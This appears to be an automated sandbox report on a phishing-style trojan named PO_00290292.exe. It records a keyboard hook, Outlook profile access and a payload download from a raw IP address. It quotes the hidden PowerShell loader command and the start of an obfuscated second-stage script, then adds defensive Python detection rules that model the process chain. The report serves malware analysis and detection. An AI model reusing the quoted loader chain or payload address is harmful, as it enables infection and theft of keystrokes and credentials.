                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004027FB FindFirstFileW
                Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mfMeuTZ127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 172.96.14.41Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: MSBuild.exe, 00000005.00000002.2591099574.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.96.14.41/mfMeuTZ127.bin
                Source: MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.96.14.41/mfMeuTZ127.bin&
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: powershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.000000002019C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.qualityaf.com
                Source: PO_00290292.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: powershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coB
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: powershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2322CB90 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,00000000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary

                Source: initial sampleStatic PE information: Filename: PO_00290292.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 26008
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_00406846
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_00404C59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB41E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABB359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABE8B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB4AB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABAA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB3EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118A2C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232254BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232254C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23221F38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23232358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323B25B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23235D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232355A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323C1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323E3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232376B0
                Source: PO_00290292.exeStatic PE information: invalid certificate
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@8/15@2/3
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_00402095 CoCreateInstance
                Source: C:\Users\user\Desktop\PO_00290292.exeFile created: C:\Users\user\Pictures\ledelsers
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
                Source: C:\Users\user\Desktop\PO_00290292.exeFile created: C:\Users\user\AppData\Local\Temp\nse6572.tmp
                Source: PO_00290292.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PO_00290292.exeFile read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\PO_00290292.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\PO_00290292.exeFile read: C:\Users\user\Desktop\PO_00290292.exe
                Source: unknownProcess created: C:\Users\user\Desktop\PO_00290292.exe C:\Users\user\Desktop\PO_00290292.exe
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi 
Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\PO_00290292.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: C:\Users\user\Desktop\PO_00290292.exe File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\skrides.ini
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                Source: PO_00290292.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
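The Process created rows on this page give the chain PO_00290292.exe -> powershell.exe -> powershell.exe -> MSBuild.exe, with MSBuild.exe started without any project to build and later reading Outlook profiles. As an added example (not the sandbox's own Sigma logic and not code from the sample), the Python below replays that chain as constructed Sysmon-style process-creation records and applies three rules a detection engineer could derive from this report. The image paths and command lines are quoted from the report's rows (the second-stage command line is cut at its opening); the PIDs, the explorer.exe root, the benign MSBuild build used as a negative case, and the rule and function names are invented for the example.

```python
"""Reconstruct and flag the process chain shown in this report.

Added example written for this page; not the sandbox's Sigma rules and not
code from the sample. Image paths and command lines are quoted from the
report. PIDs, the explorer.exe parent and the benign MSBuild build at the end
are constructed so the rules have a parent to walk to and a negative case.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS_IMAGE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD_IMAGE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),  # constructed root
    ProcEvent(200, 100, r"C:\Users\user\Desktop\PO_00290292.exe", "PO_00290292.exe"),
    ProcEvent(300, 200, PS_IMAGE,
              "powershell.exe -windowstyle hidden $derremc = Get-Content "
              r"'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; "
              'powershell.exe "$derremc"'),
    # second stage: only the opening of the command line is kept here
    ProcEvent(400, 300, PS_IMAGE,
              r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende '
              'Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>'
              '$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{'),
    ProcEvent(500, 400, MSBUILD_IMAGE,
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"),
    ProcEvent(600, 100, MSBUILD_IMAGE,  # constructed negative case: a real build
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\src\app\app.csproj /t:Build"),
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def hidden_nested_powershell(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    """Hidden powershell that loads a script file into a variable and hands the
    variable to a second powershell.exe (the PO_00290292.exe -> powershell step)."""
    cl = e.cmdline.lower()
    return (basename(e.image).lower() == "powershell.exe"
            and re.search(r"-w(?:indowstyle)?\s+hidden", cl) is not None
            and "get-content" in cl
            and re.search(r'powershell(?:\.exe)?\s+"\$\w+"', cl) is not None)


def comment_prefixed_script(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    """The first argument after the image path opens with a <# ... #> block
    comment, the shape of the second-stage command line in this report."""
    return (basename(e.image).lower() == "powershell.exe"
            and re.match(r'^(?:"[^"]*"|\S+)\s+"?<#', e.cmdline) is not None)


def msbuild_without_project(e: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    """MSBuild.exe spawned by a script host with no project, solution or
    targets file to build: nothing to compile, so it is serving as a host."""
    if basename(e.image).lower() != "msbuild.exe" or parent is None:
        return False
    if basename(parent.image).lower() not in SCRIPT_HOSTS:
        return False
    return re.search(r"\.(?:\w*proj|sln|targets)\b", e.cmdline, re.IGNORECASE) is None


RULES = [hidden_nested_powershell, comment_prefixed_script, msbuild_without_project]


def lineage(events, pid: int) -> list:
    """Walk ppid links back to the root; returns image basenames, root first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def evaluate(events) -> dict:
    """Map pid -> names of the rules that fired on that process."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        fired = [r.__name__ for r in RULES if r(e, by_pid.get(e.ppid))]
        if fired:
            hits[e.pid] = fired
    return hits


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, " -> ".join(lineage(EVENTS, pid)), names)
```

On these records the three malicious processes each trip exactly one rule and the constructed build with a .csproj argument trips none; printing the lineage beside each hit is what turns three isolated alerts into the single chain the report shows. Real Sysmon Event ID 1 or Security 4688 data carries the same four fields, so the rules port as written; the comment-prefix rule is the narrowest of the three and should be treated as a hunting signal rather than a blocking one.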

                Data Obfuscation

                Source: Yara match File source: 00000004.00000002.1607315520.00000000087AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1728501631.000000000285B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri, type: DROPPED
                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\nse6573.tmp, type: DROPPED
